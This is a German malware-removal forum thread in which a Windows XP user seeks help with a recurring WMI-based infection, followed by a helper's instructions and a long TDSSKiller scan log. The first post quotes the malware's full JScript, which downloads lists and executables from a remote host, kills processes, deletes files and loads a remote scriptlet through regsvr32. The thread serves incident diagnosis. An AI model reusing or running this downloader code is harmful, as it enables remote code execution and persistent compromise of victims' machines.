| |
| |||||||
Plagegeister aller Art und deren Bekämpfung: ActiveXObject Scrip Virus - Name: fuckyoumm2_consumerWindows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen. |
 |
23.05.2017, 12:27
| #1 |
| |  ActiveXObject Scrip Virus - Name: fuckyoumm2_consumer Der Benutzername ist Programm... bitte... ich weiß nicht mehr was ich machen soll. Windowx XP So... seit 3 Tagen versuche ich dieses elende Drecksteil los zu werden. Es kommt aber nach mehreren Stunden IMMER wieder vollkommen unabhängig von dem was ich gerade tue. Es wird NICHT!!! von Malwarebytes/DrWeb/ADWCleaner usw erkannt. Ich kann es mit Hilfe von dem Progi Autoruns in der Spalte WMI löschen wenn es wieder erscheint. fuckyoumm2_consumer Das script sieht so aus: Code:
ATTFilter var toff=3000;var url1 = "hxxp://wmi.mykings.top:8888/kill.html";http = new ActiveXObject("Msxml2.ServerXMLHTTP");fso = new ActiveXObject("Scripting.FilesystemObject");wsh = new ActiveXObject("WScript.Shell");http.open("GET", url1, false);http.send();str = http.responseText;arr = str.split("\r\n");for (i = 0; i < arr.length; i++) { t = arr[i].split(" "); proc = t[0]; path = t[1]; dele = t[2]; wsh.Run("taskkill /f /im " + proc, 0, true);if (dele == 0) { try { fso.DeleteFile(path, true); } catch (e) {} } };var locator=new ActiveXObject("WbemScripting.SWbemLocator");var service=locator.ConnectServer(".","root/cimv2");var colItems=service.ExecQuery("select * from Win32_Process");var e=new Enumerator(colItems);var t1=new Date().valueOf();for(;!e.atEnd();e.moveNext()){var p=e.item();if(p.Caption=="rundll32.exe")p.Terminate()};var t2=0;while(t2-t1<toff){var t2=new Date().valueOf()}var pp=service.get("Win32_Process");var url="hxxp://wmi.mykings.top:8888/test.html",http=new ActiveXObject("Microsoft.XMLHTTP"),ado=new ActiveXObject("ADODB.Stream"),wsh=new ActiveXObject("WScript.Shell");for(http.open("GET",url,!1),http.send(),str=http.responseText,arr=str.split("\r\n"),i=0;arr.length>i;i++)t=arr[i].split(" ",3),http.open("GET",t[0],!1),http.send(),ado.Type=1,ado.Open(),ado.Write(http.responseBody),ado.SaveToFile(t[1],2),ado.Close(),1==t[2]&&wsh.Run(t[1]);pp.create("regsvr32 /s shell32.dll");pp.create("regsvr32 /s WSHom.Ocx");pp.create("regsvr32 /s scrrun.dll");pp.create("regsvr32 /s c:\\Progra~1\\Common~1\\System\\Ado\\Msado15.dll");pp.create("regsvr32 /s jscript.dll");pp.create("regsvr32 /u /s /i:hxxp://js.mykings.top:280/v.sct scrobj.dll");pp.create("rundll32.exe c:\\windows\\debug\\item.dat,ServiceMain aaaa");
Momentan zeigt die nur: (Tue May 23 12:09:43 2017.8649656) : NT Event Log Consumer: could not retrieve sid, 0x80041002 Seid heute 9 Uhr ist das Script nicht mehr aufgegangen... Ich denke aber das es immer noch da ist da ich KEINE antivirus Seite öffnen kann. virustotal, drweb, malwarebytes egal was ich bekomme immer nur: Fehler: Server nicht gefunden Alle anderen Seiten funktionieren wie immer. In der Windows Firewall bei Ausnahmen ist ein Eintrag mit ahpobx erschienen. Port: 9589 TCP Löschen hilft nicht da es nach einem Neustart immer wieder kommt. Ich habe nun einfach den Port auf 1 geändert (Was auch noch nicht wieder geändert wurde) Die einzigen Programm die etwas finden (Ich mir aber nicht sicher bin ob es damit etwas zu tun hat) sind: Farbar Recovery Scan Tool & TDSSKillerTDSSKiller FRST & TDSSKiller Scan im Anhang. Ich heule jetzt weiter... Bin auch liebend gerne bereit das ganze per Telefon zu besprechen < pure Verzweiflung |
|
23.05.2017, 12:42
| #2 |
| /// Winkelfunktion /// TB-Süch-Tiger™   |  ActiveXObject Scrip Virus - Name: fuckyoumm2_consumerHallo und  +++ WICHTIGE HINWEISE +++ 1. Während der Analyse und Bereinigung nimmst du keine Änderungen auf eigene Faust vor, d.h. du installierst oder deinstallierst keine Software ohne Absprache! 2. Du veränderst keine Systemeinstellungen, solange wir deinen Fall bearbeiten. Änderungen, Installationen oder Deinstallationen machst du nur auf Anweisung. 3. Es wird erforderlich sein, deinen Virenscanner zu deaktivieren und in bestimmten Fällen auch zu deinstallieren, damit vernünftig bereinigt werden kann. Dein System ist daher erst wenn wir hier fertig sind wieder für den alltäglichen Gebrauch wie surfen oder mailen von mir freigegeben. 4. Während der Analyse bitte keine Nebenfragen wie zB welcher Virenscanner etc. - das wird alles zum Schluss geklärt damit die Analyse nicht unterbrochen wird. Gelesen und verstanden? Hast du noch weitere Logs (mit Funden)? Malwarebytes und/oder andere Virenscanner, sind die mal fündig geworden? Ich frage deswegen nach => http://www.trojaner-board.de/125889-...tml#post941520 Bitte keine neuen Virenscans machen sondern erst nur schon vorhandene Logs in CODE-Tags posten! Relevant sind nur Logs der letzten 7 Tage bzw. seitdem das Problem besteht! Zudem bitte auch ein Log mit Farbars Tool machen: Scan mit Farbar's Recovery Scan Tool (FRST) Bitte lade dir die passende Version von Farbar's Recovery Scan Tool auf deinen Desktop:  FRST 32-Bit | FRST 64-Bit(Wenn du nicht sicher bist: Lade beide Versionen oder unter Start > Computer (Rechtsklick) > Eigenschaften nachschauen)
 Lesestoff:Posten in CODE-Tags Die Logfiles anzuhängen oder sogar vorher in ein ZIP, RAR oder 7Z-Archiv zu packen erschwert mir massiv die Arbeit. Auch wenn die Logs für einen Beitrag zu groß sein sollten, bitte ich dich die Logs direkt und notfalls über mehrere Beiträge verteilt zu posten. Um die Logfiles in eine CODE-Box zu stellen gehe so vor:
__________________ |
|
23.05.2017, 12:46
| #3 |
| | ActiveXObject Scrip Virus - Name: fuckyoumm2_consumerCode:
ATTFilter 12:03:44.0359 2040 TDSS rootkit removing tool 2.8.15.0 Oct 31 2012 21:47:35
12:03:44.0359 2040 ============================================================
12:03:44.0359 2040 Current date / time: 2017/05/23 12:03:44.0359
12:03:44.0359 2040 SystemInfo:
12:03:44.0359 2040
12:03:44.0359 2040 Product type: Workstation
12:03:44.0359 2040 ComputerName: *
12:03:44.0359 2040 UserName: *
12:03:44.0359 2040 Windows directory: C:\WINDOWS
12:03:44.0359 2040 System windows directory: C:\WINDOWS
12:03:44.0359 2040 Processor architecture: Intel x86
12:03:44.0359 2040 Number of processors: 2
12:03:44.0359 2040 Page size: 0x1000
12:03:44.0359 2040 Boot type: Normal boot
12:03:44.0359 2040 ============================================================
12:03:44.0656 2040 Drive \Device\Harddisk0\DR0 - Size: 0x25433D6000 (149.05 Gb), SectorSize: 0x200, Cylinders: 0x4C01, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'K0', Flags 0x00000050
12:03:44.0656 2040 ============================================================
12:03:44.0656 2040 \Device\Harddisk0\DR0:
12:03:44.0656 2040 MBR partitions:
12:03:44.0656 2040 \Device\Harddisk0\DR0\Partition1: MBR, Type 0x7, StartLBA 0x3F, BlocksNum 0x7530462
12:03:44.0671 2040 \Device\Harddisk0\DR0\Partition2: MBR, Type 0x7, StartLBA 0x75304E0, BlocksNum 0x61A7927
12:03:44.0687 2040 \Device\Harddisk0\DR0\Partition3: MBR, Type 0x7, StartLBA 0xD6D7E46, BlocksNum 0x533CDBA
12:03:44.0687 2040 ============================================================
12:03:44.0703 2040 C: <-> \Device\Harddisk0\DR0\Partition1
12:03:44.0906 2040 D: <-> \Device\Harddisk0\DR0\Partition2
12:03:45.0031 2040 E: <-> \Device\Harddisk0\DR0\Partition3
12:03:45.0031 2040 ============================================================
12:03:45.0031 2040 Initialize success
12:03:45.0031 2040 ============================================================
12:04:04.0031 3580 ============================================================
12:04:04.0031 3580 Scan started
12:04:04.0031 3580 Mode: Manual; SigCheck; TDLFS;
12:04:04.0031 3580 ============================================================
12:04:04.0515 3580 ================ Scan system memory ========================
12:04:04.0515 3580 System memory - ok
12:04:04.0515 3580 ================ Scan services =============================
12:04:04.0625 3580 Abiosdsk - ok
12:04:04.0640 3580 abp480n5 - ok
12:04:04.0687 3580 [ 94B4741D2CF9ED38140B831293D1601A ] ACPI C:\WINDOWS\system32\DRIVERS\ACPI.sys
12:04:04.0890 3580 ACPI - ok
12:04:04.0906 3580 [ 9E1CA3160DAFB159CA14F83B1E317F75 ] ACPIEC C:\WINDOWS\system32\drivers\ACPIEC.sys
12:04:05.0015 3580 ACPIEC - ok
12:04:05.0031 3580 adpu160m - ok
12:04:05.0078 3580 [ 1EE7B434BA961EF845DE136224C30FEC ] aec C:\WINDOWS\system32\drivers\aec.sys
12:04:05.0109 3580 aec - ok
12:04:05.0140 3580 [ 5AC495F4CB807B2B98AD2AD591E6D92E ] AFD C:\WINDOWS\System32\drivers\afd.sys
12:04:05.0250 3580 AFD - ok
12:04:05.0250 3580 Aha154x - ok
12:04:05.0265 3580 aic78u2 - ok
12:04:05.0281 3580 aic78xx - ok
12:04:05.0312 3580 [ 1AAB6C5F8376357CB9B16C38C42C4076 ] Alerter C:\WINDOWS\system32\alrsvc.dll
12:04:05.0437 3580 Alerter - ok
12:04:05.0468 3580 [ 6596DD260FFDE1BDC994C1DF236307BB ] ALG C:\WINDOWS\System32\alg.exe
12:04:05.0500 3580 ALG - ok
12:04:05.0515 3580 AliIde - ok
12:04:05.0578 3580 [ 267FC636801EDC5AB28E14036349E3BE ] Ambfilt C:\WINDOWS\system32\drivers\Ambfilt.sys
12:04:05.0671 3580 Ambfilt - ok
12:04:05.0718 3580 [ 58BE3C2F1AA041EA56F7305A6463035C ] AmdK8 C:\WINDOWS\system32\DRIVERS\AmdK8.sys
12:04:05.0734 3580 AmdK8 - ok
12:04:05.0734 3580 amsint - ok
12:04:05.0750 3580 AppMgmt - ok
12:04:05.0765 3580 asc - ok
12:04:05.0765 3580 asc3350p - ok
12:04:05.0781 3580 asc3550 - ok
12:04:05.0796 3580 [ 02000ABF34AF4C218C35D257024807D6 ] AsyncMac C:\WINDOWS\system32\DRIVERS\asyncmac.sys
12:04:05.0921 3580 AsyncMac - ok
12:04:05.0953 3580 [ CDFE4411A69C224BD1D11B2DA92DAC51 ] atapi C:\WINDOWS\system32\DRIVERS\atapi.sys
12:04:06.0078 3580 atapi - ok
12:04:06.0078 3580 Atdisk - ok
12:04:06.0093 3580 [ EC88DA854AB7D7752EC8BE11A741BB7F ] Atmarpc C:\WINDOWS\system32\DRIVERS\atmarpc.sys
12:04:06.0203 3580 Atmarpc - ok
12:04:06.0250 3580 [ E98B8250398F6637B335A76BA8DFB602 ] AudioSrv C:\WINDOWS\System32\audiosrv.dll
12:04:06.0359 3580 AudioSrv - ok
12:04:06.0390 3580 [ D9F724AA26C010A217C97606B160ED68 ] audstub C:\WINDOWS\system32\DRIVERS\audstub.sys
12:04:06.0500 3580 audstub - ok
12:04:06.0515 3580 [ DA1F27D85E0D1525F6621372E7B685E9 ] Beep C:\WINDOWS\system32\drivers\Beep.sys
12:04:06.0640 3580 Beep - ok
12:04:06.0671 3580 [ 3A5E54A9AB96EF2D273B58136FB58EFE ] BITS C:\WINDOWS\system32\qmgr.dll
12:04:06.0781 3580 BITS - ok
12:04:06.0812 3580 [ D8653DCD80CF2EBB333FC4FCC43A7DEF ] Browser C:\WINDOWS\System32\browser.dll
12:04:06.0937 3580 Browser - ok
12:04:06.0937 3580 [ 90A673FC8E12A79AFBED2576F6A7AAF9 ] cbidf2k C:\WINDOWS\system32\drivers\cbidf2k.sys
12:04:07.0062 3580 cbidf2k - ok
12:04:07.0062 3580 cd20xrnt - ok
12:04:07.0093 3580 [ C1B486A7658353D33A10CC15211A873B ] Cdaudio C:\WINDOWS\system32\drivers\Cdaudio.sys
12:04:07.0203 3580 Cdaudio - ok
12:04:07.0218 3580 [ CD7D5152DF32B47F4E36F710B35AAE02 ] Cdfs C:\WINDOWS\system32\drivers\Cdfs.sys
12:04:07.0343 3580 Cdfs - ok
12:04:07.0375 3580 [ AF9C19B3100FE010496B1A27181FBF72 ] Cdrom C:\WINDOWS\system32\DRIVERS\cdrom.sys
12:04:07.0484 3580 Cdrom - ok
12:04:07.0484 3580 Changer - ok
12:04:07.0531 3580 [ 234D52C63C67A8CF4AF9BECCE43BFB4A ] CiSvc C:\WINDOWS\system32\cisvc.exe
12:04:07.0625 3580 CiSvc - ok
12:04:07.0640 3580 [ 0461868578D29DC18FB1C79933C5158A ] ClipSrv C:\WINDOWS\system32\clipsrv.exe
12:04:07.0765 3580 ClipSrv - ok
12:04:07.0765 3580 CmdIde - ok
12:04:07.0781 3580 COMSysApp - ok
12:04:07.0796 3580 Cpqarray - ok
12:04:07.0828 3580 [ 1A5F9DB98DF7955B4C7CBDBF2C638238 ] CryptSvc C:\WINDOWS\System32\cryptsvc.dll
12:04:07.0953 3580 CryptSvc - ok
12:04:07.0953 3580 dac2w2k - ok
12:04:07.0968 3580 dac960nt - ok
12:04:08.0000 3580 [ 891E3E4537C6DFCAE475073FC49CE9CB ] DcomLaunch C:\WINDOWS\system32\rpcss.dll
12:04:08.0046 3580 DcomLaunch - ok
12:04:08.0078 3580 [ 7C4D218F9017725589ADACAB82BEB0F8 ] Dhcp C:\WINDOWS\System32\dhcpcsvc.dll
12:04:08.0093 3580 Dhcp - ok
12:04:08.0093 3580 [ 00CA44E4534865F8A3B64F7C0984BFF0 ] Disk C:\WINDOWS\system32\DRIVERS\disk.sys
12:04:08.0218 3580 Disk - ok
12:04:08.0218 3580 dmadmin - ok
12:04:08.0281 3580 [ 5789B83BA87FC84C3568CF86CACEF8CE ] dmboot C:\WINDOWS\system32\drivers\dmboot.sys
12:04:08.0421 3580 dmboot - ok
12:04:08.0453 3580 [ 084EB0A50A4F7B4705C8A57F234E5291 ] dmio C:\WINDOWS\system32\drivers\dmio.sys
12:04:08.0562 3580 dmio - ok
12:04:08.0609 3580 [ E9317282A63CA4D188C0DF5E09C6AC5F ] dmload C:\WINDOWS\system32\drivers\dmload.sys
12:04:08.0734 3580 dmload - ok
12:04:08.0750 3580 [ FA2D9D1A9F6B5A88D01E1685CE2378BA ] dmserver C:\WINDOWS\System32\dmserver.dll
12:04:08.0859 3580 dmserver - ok
12:04:08.0906 3580 [ A6F881284AC1150E37D9AE47FF601267 ] DMusic C:\WINDOWS\system32\drivers\DMusic.sys
12:04:09.0015 3580 DMusic - ok
12:04:09.0062 3580 [ D1F5B71BBAEEE07B78980DBD878C0BC7 ] Dnscache C:\WINDOWS\System32\dnsrslvr.dll
12:04:09.0203 3580 Dnscache - ok
12:04:09.0203 3580 dpti2o - ok
12:04:09.0234 3580 [ 1ED4DBBAE9F5D558DBBA4CC450E3EB2E ] drmkaud C:\WINDOWS\system32\drivers\drmkaud.sys
12:04:09.0343 3580 drmkaud - ok
12:04:09.0375 3580 [ 877A4512CC9074D6954776AF47021766 ] ERSvc C:\WINDOWS\System32\ersvc.dll
12:04:09.0484 3580 ERSvc - ok
12:04:09.0500 3580 [ EDB6B81761BD60F32F740BBC40AFB676 ] Eventlog C:\WINDOWS\system32\services.exe
12:04:09.0625 3580 Eventlog - ok
12:04:09.0671 3580 [ BEBC63622BDC30053A3145EBD90AF450 ] EventSystem C:\WINDOWS\system32\es.dll
12:04:09.0687 3580 EventSystem - ok
12:04:09.0703 3580 [ 3117F595E9615E04F05A54FC15A03B20 ] Fastfat C:\WINDOWS\system32\drivers\Fastfat.sys
12:04:09.0828 3580 Fastfat - ok
12:04:09.0859 3580 [ 521A4CB71CC419FDF60DB83E7308AE2B ] FastUserSwitchingCompatibility C:\WINDOWS\System32\shsvcs.dll
12:04:09.0875 3580 FastUserSwitchingCompatibility - ok
12:04:09.0906 3580 [ CED2E8396A8838E59D8FD529C680E02C ] Fdc C:\WINDOWS\system32\DRIVERS\fdc.sys
12:04:10.0015 3580 Fdc - ok
12:04:10.0062 3580 [ 9E9AF89F9B14AA6249065C309CE73BD8 ] Fips C:\WINDOWS\system32\drivers\Fips.sys
12:04:10.0171 3580 Fips - ok
12:04:10.0203 3580 [ 0DD1DE43115B93F4D85E889D7A86F548 ] Flpydisk C:\WINDOWS\system32\DRIVERS\flpydisk.sys
12:04:10.0312 3580 Flpydisk - ok
12:04:10.0343 3580 [ 3D234FB6D6EE875EB009864A299BEA29 ] FltMgr C:\WINDOWS\system32\DRIVERS\fltMgr.sys
12:04:10.0375 3580 FltMgr - ok
12:04:10.0390 3580 [ 1F943241F4963CD51E5F61C93D3F45C7 ] FsVga C:\WINDOWS\system32\DRIVERS\fsvga.sys
12:04:10.0515 3580 FsVga - ok
12:04:10.0531 3580 [ 3E1E2BD4F39B0E2B7DC4F4D2BCC2779A ] Fs_Rec C:\WINDOWS\system32\drivers\Fs_Rec.sys
12:04:10.0656 3580 Fs_Rec - ok
12:04:10.0671 3580 [ 8F1955CE42E1484714B542F341647778 ] Ftdisk C:\WINDOWS\system32\DRIVERS\ftdisk.sys
12:04:10.0796 3580 Ftdisk - ok
12:04:10.0796 3580 GMSIPCI - ok
12:04:10.0812 3580 [ C0F1D4A21DE5A415DF8170616703DEBF ] Gpc C:\WINDOWS\system32\DRIVERS\msgpc.sys
12:04:10.0937 3580 Gpc - ok
12:04:10.0968 3580 [ 3FCC124B6E08EE0E9351F717DD136939 ] HDAudBus C:\WINDOWS\system32\DRIVERS\HDAudBus.sys
12:04:11.0000 3580 HDAudBus - ok
12:04:11.0046 3580 [ BA85BCF1A2BCF927C3600574173403E0 ] helpsvc C:\WINDOWS\PCHealth\HelpCtr\Binaries\pchsvc.dll
12:04:11.0171 3580 helpsvc - ok
12:04:11.0187 3580 [ B647CA198B9C73056ABFB0A9D8F4916D ] HidServ C:\WINDOWS\System32\hidserv.dll
12:04:11.0312 3580 HidServ - ok
12:04:11.0359 3580 [ 1DE6783B918F540149AA69943BDFEBA8 ] HidUsb C:\WINDOWS\system32\DRIVERS\hidusb.sys
12:04:11.0468 3580 HidUsb - ok
12:04:11.0468 3580 hpn - ok
12:04:11.0515 3580 [ CB77BB47E67E84DEB17BA29632501730 ] HTTP C:\WINDOWS\system32\Drivers\HTTP.sys
12:04:11.0546 3580 HTTP - ok
12:04:11.0562 3580 [ 9EC7E866BBDBF3ECC0E67F4E0A838EB2 ] HTTPFilter C:\WINDOWS\System32\w3ssl.dll
12:04:11.0687 3580 HTTPFilter - ok
12:04:11.0703 3580 i2omgmt - ok
12:04:11.0703 3580 i2omp - ok
12:04:11.0734 3580 [ 7C575018D0413440D75432A78B88C899 ] i8042prt C:\WINDOWS\system32\DRIVERS\i8042prt.sys
12:04:11.0843 3580 i8042prt - ok
12:04:11.0875 3580 [ F8AA320C6A0409C0380E5D8A99D76EC6 ] Imapi C:\WINDOWS\system32\DRIVERS\imapi.sys
12:04:11.0984 3580 Imapi - ok
12:04:12.0015 3580 [ 57D7267A9ED91ECAF4336B08C9628FCA ] ImapiService C:\WINDOWS\system32\imapi.exe
12:04:12.0140 3580 ImapiService - ok
12:04:12.0156 3580 ini910u - ok
12:04:12.0328 3580 [ 55920481A44FA7BDDE5FC1B9E02C7C2A ] IntcAzAudAddService C:\WINDOWS\system32\drivers\RtkHDAud.sys
12:04:12.0546 3580 IntcAzAudAddService - ok
12:04:12.0546 3580 IntelIde - ok
12:04:12.0578 3580 [ 4448006B6BC60E6C027932CFC38D6855 ] Ip6Fw C:\WINDOWS\system32\DRIVERS\Ip6Fw.sys
12:04:12.0718 3580 Ip6Fw - ok
12:04:12.0750 3580 [ 731F22BA402EE4B62748ADAF6363C182 ] IpFilterDriver C:\WINDOWS\system32\DRIVERS\ipfltdrv.sys
12:04:12.0875 3580 IpFilterDriver - ok
12:04:12.0890 3580 [ E1EC7F5DA720B640CD8FB8424F1B14BB ] IpInIp C:\WINDOWS\system32\DRIVERS\ipinip.sys
12:04:13.0015 3580 IpInIp - ok
12:04:13.0062 3580 [ E2168CBC7098FFE963C6F23F472A3593 ] IpNat C:\WINDOWS\system32\DRIVERS\ipnat.sys
12:04:13.0078 3580 IpNat - ok
12:04:13.0109 3580 [ 64537AA5C003A6AFEEE1DF819062D0D1 ] IPSec C:\WINDOWS\system32\DRIVERS\ipsec.sys
12:04:13.0218 3580 IPSec - ok
12:04:13.0250 3580 [ 50708DAA1B1CBB7D6AC1CF8F56A24410 ] IRENUM C:\WINDOWS\system32\DRIVERS\irenum.sys
12:04:13.0296 3580 IRENUM - ok
12:04:13.0312 3580 [ CE9B7AFDF0A3D7DD8D1487262316B959 ] isapnp C:\WINDOWS\system32\DRIVERS\isapnp.sys
12:04:13.0437 3580 isapnp - ok
12:04:13.0468 3580 [ B128FC0A5CD83F669D5DE4B58F77C7D6 ] Kbdclass C:\WINDOWS\system32\DRIVERS\kbdclass.sys
12:04:13.0578 3580 Kbdclass - ok
12:04:13.0625 3580 [ BA5DEDA4D934E6288C2F66CAF58D2562 ] kmixer C:\WINDOWS\system32\drivers\kmixer.sys
12:04:13.0640 3580 kmixer - ok
12:04:13.0640 3580 [ EB7FFE87FD367EA8FCA0506F74A87FBB ] KSecDD C:\WINDOWS\system32\drivers\KSecDD.sys
12:04:13.0750 3580 KSecDD - ok
12:04:13.0781 3580 [ 2865FA4ED4471929881C053A6E5A85F6 ] lanmanserver C:\WINDOWS\System32\srvsvc.dll
12:04:13.0796 3580 lanmanserver - ok
12:04:13.0843 3580 [ BA5857CA62E866CADDCFD3635D0990BC ] lanmanworkstation C:\WINDOWS\System32\wkssvc.dll
12:04:13.0843 3580 lanmanworkstation - ok
12:04:13.0859 3580 lbrtfdc - ok
12:04:13.0875 3580 [ 4C25FADD7FE1D5BD779B20D3D0EB8D7C ] LmHosts C:\WINDOWS\System32\lmhsvc.dll
12:04:13.0984 3580 LmHosts - ok
12:04:14.0015 3580 [ E5215AB942C5AC5F7EB0E54871D7A27C ] Messenger C:\WINDOWS\System32\msgsvc.dll
12:04:14.0125 3580 Messenger - ok
12:04:14.0156 3580 [ 4AE068242760A1FB6E1A44BF4E16AFA6 ] mnmdd C:\WINDOWS\system32\drivers\mnmdd.sys
12:04:14.0250 3580 mnmdd - ok
12:04:14.0296 3580 [ BB2470D20405B272EA47CA5E18F1C58E ] mnmsrvc C:\WINDOWS\system32\mnmsrvc.exe
12:04:14.0406 3580 mnmsrvc - ok
12:04:14.0421 3580 [ 91A3DA4B12F6F1D760463A7F7857F748 ] Modem C:\WINDOWS\system32\drivers\Modem.sys
12:04:14.0531 3580 Modem - ok
12:04:14.0578 3580 [ C7D9F9717916B34C1B00DD4834AF485C ] Monfilt C:\WINDOWS\system32\drivers\Monfilt.sys
12:04:14.0640 3580 Monfilt - ok
12:04:14.0640 3580 [ 71E15CA47FD947552054AFB28536268F ] Mouclass C:\WINDOWS\system32\DRIVERS\mouclass.sys
12:04:14.0765 3580 Mouclass - ok
12:04:14.0796 3580 [ 66A6F73C74E1791464160A7065CE711A ] mouhid C:\WINDOWS\system32\DRIVERS\mouhid.sys
12:04:14.0890 3580 mouhid - ok
12:04:14.0937 3580 [ 65653F3B4477F3C63E68A9659F85EE2E ] MountMgr C:\WINDOWS\system32\drivers\MountMgr.sys
12:04:15.0062 3580 MountMgr - ok
12:04:15.0062 3580 mraid35x - ok
12:04:15.0078 3580 [ 46EDCC8F2DB2F322C24F48785CB46366 ] MRxDAV C:\WINDOWS\system32\DRIVERS\mrxdav.sys
12:04:15.0203 3580 MRxDAV - ok
12:04:15.0234 3580 [ 025AF03CE51645C62F3B6907A7E2BE5E ] MRxSmb C:\WINDOWS\system32\DRIVERS\mrxsmb.sys
12:04:15.0265 3580 MRxSmb - ok
12:04:15.0296 3580 [ D059F9C7752EF461476E83180DAA5C62 ] MSDTC C:\WINDOWS\system32\msdtc.exe
12:04:15.0390 3580 MSDTC - ok
12:04:15.0406 3580 [ 561B3A4333CA2DBDBA28B5B956822519 ] Msfs C:\WINDOWS\system32\drivers\Msfs.sys
12:04:15.0515 3580 Msfs - ok
12:04:15.0515 3580 MSIServer - ok
12:04:15.0562 3580 [ AE431A8DD3C1D0D0610CDBAC16057AD0 ] MSKSSRV C:\WINDOWS\system32\drivers\MSKSSRV.sys
12:04:15.0671 3580 MSKSSRV - ok
12:04:15.0671 3580 [ 13E75FEF9DFEB08EEDED9D0246E1F448 ] MSPCLOCK C:\WINDOWS\system32\drivers\MSPCLOCK.sys
12:04:15.0796 3580 MSPCLOCK - ok
12:04:15.0828 3580 [ 1988A33FF19242576C3D0EF9CE785DA7 ] MSPQM C:\WINDOWS\system32\drivers\MSPQM.sys
12:04:15.0953 3580 MSPQM - ok
12:04:15.0984 3580 [ 469541F8BFD2B32659D5D463A6714BCE ] mssmbios C:\WINDOWS\system32\DRIVERS\mssmbios.sys
12:04:16.0109 3580 mssmbios - ok
12:04:16.0109 3580 [ 82035E0F41C2DD05AE41D27FE6CF7DE1 ] Mup C:\WINDOWS\system32\drivers\Mup.sys
12:04:16.0218 3580 Mup - ok
12:04:16.0250 3580 [ 558635D3AF1C7546D26067D5D9B6959E ] NDIS C:\WINDOWS\system32\drivers\NDIS.sys
12:04:16.0359 3580 NDIS - ok
12:04:16.0375 3580 [ 08D43BBDACDF23F34D79E44ED35C1B4C ] NdisTapi C:\WINDOWS\system32\DRIVERS\ndistapi.sys
12:04:16.0484 3580 NdisTapi - ok
12:04:16.0515 3580 [ 34D6CD56409DA9A7ED573E1C90A308BF ] Ndisuio C:\WINDOWS\system32\DRIVERS\ndisuio.sys
12:04:16.0625 3580 Ndisuio - ok
12:04:16.0640 3580 [ 0B90E255A9490166AB368CD55A529893 ] NdisWan C:\WINDOWS\system32\DRIVERS\ndiswan.sys
12:04:16.0750 3580 NdisWan - ok
12:04:16.0750 3580 [ 59FC3FB44D2669BC144FD87826BB571F ] NDProxy C:\WINDOWS\system32\drivers\NDProxy.sys
12:04:16.0875 3580 NDProxy - ok
12:04:16.0890 3580 [ 3A2ACA8FC1D7786902CA434998D7CEB4 ] NetBIOS C:\WINDOWS\system32\DRIVERS\netbios.sys
12:04:17.0015 3580 NetBIOS - ok
12:04:17.0046 3580 [ 0C80E410CD2F47134407EE7DD19CC86B ] NetBT C:\WINDOWS\system32\DRIVERS\netbt.sys
12:04:17.0140 3580 NetBT - ok
12:04:17.0156 3580 [ F4EFF57254F565F39B6029150414A0D5 ] NetDDE C:\WINDOWS\system32\netdde.exe
12:04:17.0265 3580 NetDDE - ok
12:04:17.0265 3580 [ F4EFF57254F565F39B6029150414A0D5 ] NetDDEdsdm C:\WINDOWS\system32\netdde.exe
12:04:17.0375 3580 NetDDEdsdm - ok
12:04:17.0390 3580 [ 183805EB05BCA5A1E4AAAED4D2BE3690 ] Netlogon C:\WINDOWS\system32\lsass.exe
12:04:17.0500 3580 Netlogon - ok
12:04:17.0531 3580 [ 1E5218FBE323C375B488318950E10FB4 ] Netman C:\WINDOWS\System32\netman.dll
12:04:17.0562 3580 Netman - ok
12:04:17.0593 3580 [ B36E08F680BAE4DFC5C24D00A2DFC9E7 ] Nla C:\WINDOWS\System32\mswsock.dll
12:04:17.0703 3580 Nla - ok
12:04:17.0718 3580 [ 4F601BCB8F64EA3AC0994F98FED03F8E ] Npfs C:\WINDOWS\system32\drivers\Npfs.sys
12:04:17.0812 3580 Npfs - ok
12:04:17.0812 3580 npggsvc - ok
12:04:17.0843 3580 [ 9131FE60ADFAB595C8DA53AD6A06AA31 ] NPPTNT2 C:\WINDOWS\system32\npptNT2.sys
12:04:17.0859 3580 NPPTNT2 ( UnsignedFile.Multi.Generic ) - warning
12:04:17.0859 3580 NPPTNT2 - detected UnsignedFile.Multi.Generic (1)
12:04:17.0906 3580 [ 19A811EF5F1ED5C926A028CE107FF1AF ] Ntfs C:\WINDOWS\system32\drivers\Ntfs.sys
12:04:17.0937 3580 Ntfs - ok
12:04:17.0937 3580 [ 183805EB05BCA5A1E4AAAED4D2BE3690 ] NtLmSsp C:\WINDOWS\system32\lsass.exe
12:04:18.0046 3580 NtLmSsp - ok
12:04:18.0093 3580 [ 428AA946A8D9F32DBB4260C8E6E13377 ] NtmsSvc C:\WINDOWS\system32\ntmssvc.dll
12:04:18.0218 3580 NtmsSvc - ok
12:04:18.0234 3580 [ 73C1E1F395918BC2C6DD67AF7591A3AD ] Null C:\WINDOWS\system32\drivers\Null.sys
12:04:18.0343 3580 Null - ok
12:04:18.0453 3580 [ 15A6306A0B958BF60F09688D0EE70479 ] nv C:\WINDOWS\system32\DRIVERS\nv4_mini.sys
12:04:18.0562 3580 nv - ok
12:04:18.0593 3580 [ 947C4A0E7B25BCECC3B40F0F1070378B ] nvata C:\WINDOWS\system32\DRIVERS\nvata.sys
12:04:18.0593 3580 nvata - ok
12:04:18.0609 3580 [ 4D6F0D3FB17C1BA64942F415C73ADCDB ] NVENETFD C:\WINDOWS\system32\DRIVERS\NVENETFD.sys
12:04:18.0640 3580 NVENETFD - ok
12:04:18.0656 3580 [ 921E63AA1E1A20302223D016ACAFB52B ] nvnetbus C:\WINDOWS\system32\DRIVERS\nvnetbus.sys
12:04:18.0687 3580 nvnetbus - ok
12:04:18.0703 3580 [ 986D6666E076AFD2B60ACAFD5B01A00F ] NVSvc C:\WINDOWS\system32\nvsvc32.exe
12:04:18.0734 3580 NVSvc - ok
12:04:18.0765 3580 [ B305F3FAD35083837EF46A0BBCE2FC57 ] NwlnkFlt C:\WINDOWS\system32\DRIVERS\nwlnkflt.sys
12:04:18.0859 3580 NwlnkFlt - ok
12:04:18.0875 3580 [ C99B3415198D1AAB7227F2C88FD664B9 ] NwlnkFwd C:\WINDOWS\system32\DRIVERS\nwlnkfwd.sys
12:04:19.0000 3580 NwlnkFwd - ok
